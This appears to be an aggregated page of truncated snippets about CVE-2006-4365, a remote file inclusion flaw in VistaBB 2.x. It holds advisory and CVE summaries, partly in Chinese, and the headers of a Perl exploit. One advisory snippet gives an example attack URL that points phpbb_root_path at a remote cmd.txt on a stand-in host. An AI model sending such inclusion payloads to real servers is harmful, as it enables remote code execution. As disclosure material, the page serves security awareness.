VistaBB <= 2.x (functions_mod_user.php) Remote Include Exploit

No description provided by source...

VistaBB phpbb_root_path变量远程文件包含漏洞

VistaBB是一款由土耳其开发者所开发的论坛程序。 VistaBB的实现上存在输入验证漏洞，远程攻击者可能利用此漏洞在服务器上执行任意命令。 VistaBB的includes/functionsmoduser.php和includes/functionsportal.php脚本没有正确验证phpbbrootpath参数的输入，攻击者可以通过包含本地或外部资源的文件导致执行任意PHP代码。成功的攻击要求打开了registerglobals。 VistaBB VistaBB = 2.x 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：...

vistabb2x.txt

--Security Report-- Advisory: VistaBB http://site/vistabbpath/includes/functionsmoduser.php?phpbbrootpath=FILE EXAMPLE - http://site/vistabbpath/includes/functionsmoduser.php?phpbbrootpath=http://yoursite.com/cmd.txt? EXAMPLE -...

CVE-2006-4365

VistaBB 2.0.33 and earlier are affected by multiple PHP remote file inclusion vulnerabilities. An attacker can cause arbitrary PHP code execution by supplying a crafted URL in the phpbb_root_path parameter to (1) includes/functions_mod_user.php or (2) includes/functions_portal.php. The root cause...

CVE-2006-4365

Multiple PHP remote file inclusion vulnerabilities in VistaBB 2.0.33 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter in 1 includes/functionsmoduser.php or 2 includes/functionsportal.php...

[Full-disclosure] Advisory: VistaBB &lt;= 2.x Multiple File Inclusion Vulnerabilities

--Security Report-- Advisory: VistaBB = 2.x Multiple File Inclusion Vulnerabilities --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 24/08/06 03:00 AM --- Contacts: ICQ: 10072 MSN/Email: [email protected] Web: http://www.nukedx.com --- Vendor: VistaBB http://www.vistabb.net...

VistaBB <= 2.x (functions_mod_user.php) Remote Include Exploit

Exploit for unknown platform in category web applications ============================================================== VistaBB ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN: email protected Original advisory can be found at: http://www.nukedx.com/?viewdoc=48 VistaBB Copyright 2006 C nukedx...

VistaBB 2.x - functions_mod_user.php Remote File Inclusion

VistaBB 2.x - functionsmoduser.php Remote File Inclusion !/usr/bin/perl Method found and exploit scripted by nukedx Contacts ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN: [email protected] Original advisory can be found at: http://www.nukedx.com/?viewdoc=48 VistaBB Copyright 2006 C nukedx Greet...

VistaBB &lt;= 2.x (functions_mod_user.php) Remote Include Exploit

No description provided by source. !/usr/bin/perl Method found and exploit scripted by nukedx Contacts ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN: [email protected] Original advisory can be found at: http://www.nukedx.com/?viewdoc=48 VistaBB = 2.x Remote Command Execution Exploit This exploit...

VistaBB 2.x - &#039;functions_mod_user.php&#039; Remote File Inclusion

!/usr/bin/perl Method found and exploit scripted by nukedx Contacts ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN: [email protected] Original advisory can be found at: http://www.nukedx.com/?viewdoc=48 VistaBB Copyright 2006 C nukedx Greetz to: WW,xT,php from my team NWPX , str0ke , cha0s , Pred...